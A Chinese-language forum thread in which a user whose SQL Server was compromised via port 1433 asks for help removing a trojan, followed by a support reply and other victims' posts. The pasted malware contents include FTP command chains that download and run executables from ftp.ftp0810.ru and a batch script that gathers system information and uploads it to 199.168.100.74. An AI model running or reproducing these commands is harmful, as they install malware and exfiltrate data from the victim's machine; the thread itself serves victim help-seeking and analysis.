黑客 大佬都过来看看,这个木马怎么处理?
我自从安装sql2008外网就没有连接通过,1433开放后就被中毒,不晓得他到底要干啥,所有杀毒被屏蔽,只要打开连包含关键字的标题框也被关闭,360所有软件被开机时全部干掉
先上图,这是任务计划
这是自动下载的木马
这是木马内部内容,懂的看一眼就会了
附件木马自己研究,找到开机启动下载木马的程序位置说一声,我难得装系统
就看看有人出来处理没得?看看有大佬没得?,看看360工程师是不是自己的软件被干掉了这个问题都解决不了,期待解决 再给你们说,这家伙就用了个upx3.9加的壳,还加了3次,呵呵 MicrosoftsWindowsu c:\windows\temp\conhou.exe
mysa /c echo open ftp.ftp0810.ru>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe
mysa2/c echo open ftp.ftp0810.ru>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
mysa3/c echo open ftp.ftp0810.ru>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe
okrundll32.exec:\windows\debug\ok.dat,ServiceMain aaaa @echo off
SETLOCAL ENABLEDELAYEDEXPANSION
for /f %%a in ('wmic nicconfig where^(ipenabled^=true^) get index^|findstr ') do set i=%%a
for /f %%a in ('wmic nicconfig where^(index^=%i%^) get macaddress^|findstr ') do set a=%%a &set a=!a::=!
tasklist>"c:\windows\debug\%a%.txt"
ver>>"c:\windows\debug\%a%.txt"
whoami>>"c:\windows\debug\%a%.txt"
dir c:\windows\debug>>"c:\windows\debug\%a%.txt"
dir c:\windows\temp>>"c:\windows\debug\%a%.txt"
@echo off
echo open 199.168.100.74>ftp.up
echo up>>ftp.up
echo 1433>> ftp.up
Echo binary>>ftp.up
Echo put "c:\windows\debug\*.txt">> ftp.up
Echo bye>>ftp.up
FTP -s:ftp.up
del ftp.up /q
exit 您好,收到,我们先看下您提供的附件,进行分析,后续有结果和您反馈,谢谢 还没有解决啊,看来只有重装系统了 感谢四海一叶秋帮组解决,果然是Bootkit病毒,并且清理了全盘蠕虫 我的也是这个,还是服务器,咋个处理啊,求解{:15_449:}
页:
[1]